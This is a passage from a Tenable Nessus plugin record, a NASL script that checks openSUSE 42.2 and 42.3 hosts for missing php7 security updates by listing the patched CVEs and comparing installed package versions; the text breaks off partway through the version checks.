"p-cpe:/a:novell:opensuse:php7-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php7-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php7-ldap", "p-cpe:/a:novell:opensuse:php7-ftp", "p-cpe:/a:novell:opensuse:php7-exif-debuginfo", "cpe:/o:novell:opensuse:42.2", "p-cpe:/a:novell:opensuse:php7-posix", "p-cpe:/a:novell:opensuse:php7", "p-cpe:/a:novell:opensuse:php7-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php7-exif", "p-cpe:/a:novell:opensuse:php7-curl-debuginfo", "p-cpe:/a:novell:opensuse:php7-dba", "p-cpe:/a:novell:opensuse:php7-sysvmsg", "p-cpe:/a:novell:opensuse:php7-devel", "p-cpe:/a:novell:opensuse:php7-gd-debuginfo", "p-cpe:/a:novell:opensuse:php7-sysvshm", "p-cpe:/a:novell:opensuse:php7-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php7-calendar", "p-cpe:/a:novell:opensuse:php7-fpm", "p-cpe:/a:novell:opensuse:php7-mcrypt", "p-cpe:/a:novell:opensuse:php7-dom-debuginfo", "p-cpe:/a:novell:opensuse:php7-bcmath", "p-cpe:/a:novell:opensuse:php7-phar-debuginfo", "p-cpe:/a:novell:opensuse:php7-pdo", "p-cpe:/a:novell:opensuse:php7-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php7-readline-debuginfo", "p-cpe:/a:novell:opensuse:php7-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php7-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php7-bz2"], "id": "OPENSUSE-2017-994.NASL", "href": "https://www.tenable.com/plugins/nessus/102947", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-994.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102947);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11142\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-7890\");\n\n script_name(english:\"openSUSE Security Update : php7 (openSUSE-2017-994)\");\n script_summary(english:\"Check for the openSUSE-2017-994 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for php7 fixes the following issues :\n\n - CVE-2016-10397: parse_url() can be bypassed to return\n fake host. (bsc#1047454)\n\n - CVE-2017-11142: Remoteattackers could cause a CPU\n consumption denial of service attack by injectinglong\n form variables, related to main/php_variables.\n (bsc#1048100)\n\n - CVE-2017-11144: The opensslextension PEM sealing code\n did not check the return value of the OpenSSL\n sealingfunction, which could lead to a crash.\n (bsc#1048096)\n\n - CVE-2017-11145: Lack of bounds checks in\n timelib_meridian coud lead to information leak.\n (bsc#1048112)\n\n - CVE-2017-11146: Lack of bounds checks in\n timelib_meridian parse code could lead to information\n leak. (bsc#1048111)\n\n - CVE-2017-11147: The PHAR archive handler could beused by\n attackers supplying malicious archive files to crash the\n PHP interpreteror potentially disclose information.\n (bsc#1048094)\n\n - CVE-2017-11628: Stack-base dbuffer overflow in\n zend_ini_do_op() could lead to denial of service\n (bsc#1050726)\n\n - CVE-2017-7890: Buffer over-read from uninitialized data\n in gdImageCreateFromGifCtx function could lead to denial\n of service (bsc#1050241)\n\n - CVE-2016-5766: Integer Overflow in _gd2GetHeader()\n resulting in heap overflow could lead to denial of\n service or code execution (bsc#986386)\n\nOther fixes :\n\n - Soap Request with References (bsc#1053645)\n\n - php7-pear should explicitly require\n php7-pear-Archive_Tar otherwise this dependency must be\n declared in every php7-pear-* package explicitly.\n [bnc#1052389]\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1047454\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048096\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048100\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048111\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1048112\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050241\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1050726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1052389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1053645\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986386\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php7 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pear-Archive_Tar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php7-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2|SUSE42\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2 / 42.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php7-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"apache2-mod_php7-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bcmath-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bcmath-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bz2-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-bz2-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-calendar-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-calendar-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ctype-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ctype-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-curl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-curl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dba-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dba-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-debugsource-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-devel-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dom-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dom-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-enchant-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-enchant-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-exif-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-exif-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fastcgi-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fastcgi-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fileinfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fileinfo-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-firebird-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-firebird-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fpm-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fpm-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ftp-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ftp-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gd-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gd-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gettext-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gettext-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gmp-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gmp-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-iconv-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-iconv-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-imap-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-imap-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-intl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-intl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-json-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-json-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ldap-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ldap-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mbstring-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mbstring-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mcrypt-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mcrypt-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mysql-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mysql-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-odbc-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-odbc-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-opcache-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-opcache-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-openssl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-openssl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pcntl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pcntl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pdo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pdo-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pear-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pear-Archive_Tar-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pgsql-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pgsql-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-phar-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-phar-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-posix-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-posix-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pspell-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pspell-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-readline-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-readline-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-shmop-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-shmop-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-snmp-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-snmp-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-soap-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-soap-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sockets-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sockets-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sqlite-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sqlite-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvmsg-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvmsg-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( 